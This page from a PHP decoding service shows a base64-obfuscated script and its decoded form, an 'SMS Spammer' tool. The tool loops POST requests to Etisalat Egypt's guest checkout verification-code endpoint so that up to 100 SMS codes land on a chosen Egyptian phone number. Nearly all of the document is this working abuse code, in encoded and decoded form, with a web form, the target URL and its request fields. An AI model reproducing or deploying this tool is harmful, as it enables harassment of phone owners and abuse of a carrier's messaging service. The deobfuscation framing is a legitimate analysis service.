Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(base64_decode("ZWNobyAnCjxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KPHN0eWxlIHR5cGU9InRleHQvY3NzIj..

Decoded Output download

echo '
<meta charset="utf-8">
<style type="text/css">
body {background-color: #4D5057;}
input[type=text] {width: 60%;padding: 12px 20px;margin: 8px 0;box-sizing: border-box;-webkit-transition: 0.5s;transition: 0.5s;}
input[type=number] {width: 60%;padding: 12px 20px;margin: 8px 0;box-sizing: border-box;}
input[type=text]:focus {border: 3px solid #555;}
.msgerror{padding: :34px 54px;border: 1px solid;color: #D8000C;background-color: #FFBABA;}
h2{font-size: 30px;font-family: "Lobster", helvetica, arial;color:white;}
h3{font-size: 15px;font-family: "Lobster", helvetica, arial;color:white;}
a{color:white;text-decoration: none;}
input[type=submit]{background-color: #008CBA; border: none;color: white;padding: 9px 42px;
text-align: center;text-decoration: none;display: inline-block;font-size: 16px;
} </style> <center>';

echo '
<h2>SMS Spammer</h2>
<h3>By: <a href="https://www.facebook.com/ahmed22ragap2">Ahmed Ragab</a> For <a href="https://www.facebook.com/pegMM">Ghosts</a> </h3>
<form accept="" method="post">
<input type="text" name="num0" id="input-a" placeholder=" "> <br>
<input type="number" name="add" id="input-a" placeholder=" "><br>
<input type="submit" name="sendnow" value="">
</form>
'; 
ini_set('max_execution_time', 300); //300 seconds = 5 minutes
$number = htmlspecialchars($_POST['num0']);
$add = $_POST['add'];
$kkk = 1;
$add = htmlspecialchars($_POST['add']);
$parm = preg_match("/^(010)([0-9]{8})$/", $number);


$url = "https://www.etisalat.eg/eshop/checkout/shipping.jsp?_DARGS=/checkout/shipping.jsp.sendCodeForm";
$data = array(
"_dyncharset"=>"utf-8",
"_dynSessConf"=>"342269236985937339",
"/atg/commerce/order/purchase/ExpressCheckoutFormHandler.guestEmail"=>"",
"_D:/atg/commerce/order/purchase/ExpressCheckoutFormHandler.guestEmail"=> "",
"/atg/commerce/order/purchase/ExpressCheckoutFormHandler.guestMsisdn"=> $number,
"_D:/atg/commerce/order/purchase/ExpressCheckoutFormHandler.guestMsisdn"=> "",
"/atg/commerce/order/purchase/ExpressCheckoutFormHandler.sendGuestVerificationCode"=>"",
"_D:/atg/commerce/order/purchase/ExpressCheckoutFormHandler.sendGuestVerificationCode"=> "",
"_DARGS=>/checkout/shipping.jsp.sendCodeForm"=>""
);

if(isset($_POST['sendnow'])){
if($add > 100){
	echo "<span class='msgerror'> 100   </span>";
}else{
echo '<div id="result" style="
margin:4px, 7px; padding:9px; color:#1A9325;background-color: white; width: 390px; 
height: 180px; overflow-x: hidden; overflow-x: auto; text-align:justify; 
font-size:12;border-style: solid;border-width: 1px;"> ';


	while ($click <= $add ) {
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query($data));
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
	$ex = curl_exec($ch);
	if(!empty($ch)){

	echo "Sent to: ".$number." <br>";
}
	$click ++;

	curl_close($ch);
}

}
}

Did this file decode correctly?

Original Code

eval(base64_decode("ZWNobyAnCjxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KYm9keSB7YmFja2dyb3VuZC1jb2xvcjogIzRENTA1Nzt9CmlucHV0W3R5cGU9dGV4dF0ge3dpZHRoOiA2MCU7cGFkZGluZzogMTJweCAyMHB4O21hcmdpbjogOHB4IDA7Ym94LXNpemluZzogYm9yZGVyLWJveDstd2Via2l0LXRyYW5zaXRpb246IDAuNXM7dHJhbnNpdGlvbjogMC41czt9CmlucHV0W3R5cGU9bnVtYmVyXSB7d2lkdGg6IDYwJTtwYWRkaW5nOiAxMnB4IDIwcHg7bWFyZ2luOiA4cHggMDtib3gtc2l6aW5nOiBib3JkZXItYm94O30KaW5wdXRbdHlwZT10ZXh0XTpmb2N1cyB7Ym9yZGVyOiAzcHggc29saWQgIzU1NTt9Ci5tc2dlcnJvcntwYWRkaW5nOiA6MzRweCA1NHB4O2JvcmRlcjogMXB4IHNvbGlkO2NvbG9yOiAjRDgwMDBDO2JhY2tncm91bmQtY29sb3I6ICNGRkJBQkE7fQpoMntmb250LXNpemU6IDMwcHg7Zm9udC1mYW1pbHk6ICJMb2JzdGVyIiwgaGVsdmV0aWNhLCBhcmlhbDtjb2xvcjp3aGl0ZTt9Cmgze2ZvbnQtc2l6ZTogMTVweDtmb250LWZhbWlseTogIkxvYnN0ZXIiLCBoZWx2ZXRpY2EsIGFyaWFsO2NvbG9yOndoaXRlO30KYXtjb2xvcjp3aGl0ZTt0ZXh0LWRlY29yYXRpb246IG5vbmU7fQppbnB1dFt0eXBlPXN1Ym1pdF17YmFja2dyb3VuZC1jb2xvcjogIzAwOENCQTsgYm9yZGVyOiBub25lO2NvbG9yOiB3aGl0ZTtwYWRkaW5nOiA5cHggNDJweDsKdGV4dC1hbGlnbjogY2VudGVyO3RleHQtZGVjb3JhdGlvbjogbm9uZTtkaXNwbGF5OiBpbmxpbmUtYmxvY2s7Zm9udC1zaXplOiAxNnB4Owp9IDwvc3R5bGU+IDxjZW50ZXI+JzsKCmVjaG8gJwo8aDI+U01TIFNwYW1tZXI8L2gyPgo8aDM+Qnk6IDxhIGhyZWY9Imh0dHBzOi8vd3d3LmZhY2Vib29rLmNvbS9haG1lZDIycmFnYXAyIj5BaG1lZCBSYWdhYjwvYT4gRm9yIDxhIGhyZWY9Imh0dHBzOi8vd3d3LmZhY2Vib29rLmNvbS9wZWdNTSI+R2hvc3RzPC9hPiA8L2gzPgo8Zm9ybSBhY2NlcHQ9IiIgbWV0aG9kPSJwb3N0Ij4KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9Im51bTAiIGlkPSJpbnB1dC1hIiBwbGFjZWhvbGRlcj0i2LHZgtmFINin2YTZhdmI2KjYp9mK2YQiPiA8YnI+CjxpbnB1dCB0eXBlPSJudW1iZXIiIG5hbWU9ImFkZCIgaWQ9ImlucHV0LWEiIHBsYWNlaG9sZGVyPSLYudiv2K8g2KfZhNix2LPYp9mK2YQiPjxicj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ic2VuZG5vdyIgdmFsdWU9Itil2LHYs9in2YQiPgo8L2Zvcm0+Cic7IAppbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCAzMDApOyAvLzMwMCBzZWNvbmRzID0gNSBtaW51dGVzCiRudW1iZXIgPSBodG1sc3BlY2lhbGNoYXJzKCRfUE9TVFsnbnVtMCddKTsKJGFkZCA9ICRfUE9TVFsnYWRkJ107CiRra2sgPSAxOwokYWRkID0gaHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ2FkZCddKTsKJHBhcm0gPSBwcmVnX21hdGNoKCIvXigwMTApKFswLTldezh9KSQvIiwgJG51bWJlcik7CgoKJHVybCA9ICJodHRwczovL3d3dy5ldGlzYWxhdC5lZy9lc2hvcC9jaGVja291dC9zaGlwcGluZy5qc3A/X0RBUkdTPS9jaGVja291dC9zaGlwcGluZy5qc3Auc2VuZENvZGVGb3JtIjsKJGRhdGEgPSBhcnJheSgKIl9keW5jaGFyc2V0Ij0+InV0Zi04IiwKIl9keW5TZXNzQ29uZiI9PiIzNDIyNjkyMzY5ODU5MzczMzkiLAoiL2F0Zy9jb21tZXJjZS9vcmRlci9wdXJjaGFzZS9FeHByZXNzQ2hlY2tvdXRGb3JtSGFuZGxlci5ndWVzdEVtYWlsIj0+IiIsCiJfRDovYXRnL2NvbW1lcmNlL29yZGVyL3B1cmNoYXNlL0V4cHJlc3NDaGVja291dEZvcm1IYW5kbGVyLmd1ZXN0RW1haWwiPT4gIiIsCiIvYXRnL2NvbW1lcmNlL29yZGVyL3B1cmNoYXNlL0V4cHJlc3NDaGVja291dEZvcm1IYW5kbGVyLmd1ZXN0TXNpc2RuIj0+ICRudW1iZXIsCiJfRDovYXRnL2NvbW1lcmNlL29yZGVyL3B1cmNoYXNlL0V4cHJlc3NDaGVja291dEZvcm1IYW5kbGVyLmd1ZXN0TXNpc2RuIj0+ICIiLAoiL2F0Zy9jb21tZXJjZS9vcmRlci9wdXJjaGFzZS9FeHByZXNzQ2hlY2tvdXRGb3JtSGFuZGxlci5zZW5kR3Vlc3RWZXJpZmljYXRpb25Db2RlIj0+IiIsCiJfRDovYXRnL2NvbW1lcmNlL29yZGVyL3B1cmNoYXNlL0V4cHJlc3NDaGVja291dEZvcm1IYW5kbGVyLnNlbmRHdWVzdFZlcmlmaWNhdGlvbkNvZGUiPT4gIiIsCiJfREFSR1M9Pi9jaGVja291dC9zaGlwcGluZy5qc3Auc2VuZENvZGVGb3JtIj0+IiIKKTsKCmlmKGlzc2V0KCRfUE9TVFsnc2VuZG5vdyddKSl7CmlmKCRhZGQgPiAxMDApewoJZWNobyAiPHNwYW4gY2xhc3M9J21zZ2Vycm9yJz7Yp9iu2LHZgyAxMDAg2LHYs9in2YTZhyDZiti52YTZgiA8L3NwYW4+IjsKfWVsc2V7CmVjaG8gJzxkaXYgaWQ9InJlc3VsdCIgc3R5bGU9IgptYXJnaW46NHB4LCA3cHg7IHBhZGRpbmc6OXB4OyBjb2xvcjojMUE5MzI1O2JhY2tncm91bmQtY29sb3I6IHdoaXRlOyB3aWR0aDogMzkwcHg7IApoZWlnaHQ6IDE4MHB4OyBvdmVyZmxvdy14OiBoaWRkZW47IG92ZXJmbG93LXg6IGF1dG87IHRleHQtYWxpZ246anVzdGlmeTsgCmZvbnQtc2l6ZToxMjtib3JkZXItc3R5bGU6IHNvbGlkO2JvcmRlci13aWR0aDogMXB4OyI+ICc7CgoKCXdoaWxlICgkY2xpY2sgPD0gJGFkZCApIHsKCSRjaCA9IGN1cmxfaW5pdCgpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHVybCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVCwgMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUyxodHRwX2J1aWxkX3F1ZXJ5KCRkYXRhKSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCAyKTsKCSRleCA9IGN1cmxfZXhlYygkY2gpOwoJaWYoIWVtcHR5KCRjaCkpewoKCWVjaG8gIlNlbnQgdG86ICIuJG51bWJlci4iIDxicj4iOwp9CgkkY2xpY2sgKys7CgoJY3VybF9jbG9zZSgkY2gpOwp9Cgp9Cn0="));

Function Calls

base64_decode 1

Variables

None

Stats

MD5 2995c7b55445fe752947da3cebc75986
Eval Count 1
Decode Time 86 ms